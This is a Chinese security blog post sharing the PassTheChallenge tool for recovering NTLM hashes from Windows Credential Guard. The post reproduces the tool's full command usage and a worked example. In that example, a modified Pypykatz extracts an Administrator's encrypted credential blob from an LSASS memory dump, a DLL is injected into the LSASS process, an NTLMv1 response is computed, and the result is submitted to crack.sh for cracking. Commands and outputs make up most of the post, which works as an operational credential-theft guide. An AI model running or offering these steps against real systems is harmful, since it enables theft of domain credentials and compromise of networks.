从Credential Guard中恢复NTLM哈希值

作者：Sec-Labs | 发布时间：2022-12-27 16:08:00

项目地址

https://github.com/ly4k/PassTheChallenge

通过挑战

从 Credential Guard 恢复 NTLM 哈希。在此处阅读有关这些技术的更多信息。

用法

发布可以在这里找到。

Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)

Usage: <command> [<parameters...>]

Commands:
    inject - Inject module and start PtC-RPC server inside LSASS
    ping - Ping the PtC-RPC server inside LSASS
    challenge - Calculate NTLMv2 Response using encrypted credentials
      <addresses> - <context handle>:<proxy info>
      <encrypted blob> - <HEX>
      <server challenge> - <UTF16_HEX domain>:<UTF16_HEX username>:<HEX server name>:<HEX server challenge>
    nthash - Calculate NTLMv1 Response using encrypted credentials
      <addresses> - <context handle>:<proxy info>
      <encrypted blob> - <HEX>
      [<server challenge>] - If omitted, a static challenge of 1122334455667788 will be used
    protect - Convert NT hash to encrypted blob
      <addresses> - <context handle>:<proxy info>
      <nt hash> - <HEX>
    compare - Compare two encrypted blobs or an encrypted blob with a NT hash
      <addresses> - <context handle>:<proxy info>
      <encrypted blob> - <HEX>
      <encrypted blob/NT hash> - <HEX>

Examples:
    PtC.exe inject [<module>]
    PtC.exe ping
    PtC.exe challenge 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...] 6c0079[...]:610064[...]:020008[...]:66a98b[...]
    PtC.exe nthash 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...]
    PtC.exe protect 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...]
    PtC.exe compare 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...] 66a98b[...]

例子

首先，使用修改后的 Pypykatz 版本从 LSASS 内存转储中提取加密凭据，以及“上下文句柄”和“代理信息”。

> python3 -m pypykatz lsa minidump lsass.DMP -p msv
[...]
luid 194748
        == MSV ==
                Username: Administrator
                Domain: corp
                        [LSA Isolated Data]
                        Is NT Present: True
                        Context Handle: 0x1b6d5216c60
                        Proxy Info: 0x7ffdd8bfd380
                        Encrypted blob: a0000000000000000800000064000000010000000101000001000000366f55058c45738be16ab11f1d78586f2649f0c348b3171496cd7ef39dd4f3bb3dfda4ea33fb46d407887a570b1d545d0100000000000000000000000000000001000000340000004e746c6d48617368256a784d729f032326c6f16b07ebbd279dab88912c12e9b7f8b16e3a5ccdce5f70b65eef248cf38faf856a9793cba54c7f8bf4ef
                DPAPI: c02c86e371103ad7d7d352b19af1a74a00000000
[...]

然后将 SecurityPackage.dll 模块注入到 LSASS 进程中。确保它 SecurityPackage.dll 位于您当前的工作目录中，或者指定一个替代路径作为第一个参数。

> .\PassTheChallenge.exe inject <[path to module]>
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)

[+] Package seems to be loaded

检索 NTLM 哈希的简单方法是使用 nthash 命令，如下所示，使用 Pypykatz 转储中的值。

> .\PassTheChallenge.exe nthash 0x1b6d5216c60:0x7ffdd8bfd380 a0000000000000000800000064000000010000000101000001000000366f55058c45738be16ab11f1d78586f2649f0c348b3171496cd7ef39dd4f3bb3dfda4ea33fb46d407887a570b1d545d0100000000000000000000000000000001000000340000004e746c6d48617368256a784d729f032326c6f16b07ebbd279dab88912c12e9b7f8b16e3a5ccdce5f70b65eef248cf38faf856a9793cba54c7f8bf4ef
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)

[+] Server is alive
[+] Response:

NTHASH:0F2FBBD336C44CB24E5189483F77378135F02C79D225B1AC

最后，免费将 NTHASH 提交到 crack.sh 并等待大约 30 秒以恢复您的 NTLM 哈希。

有关更多详细信息，请参阅博客文章。

标签：工具分享, NTLM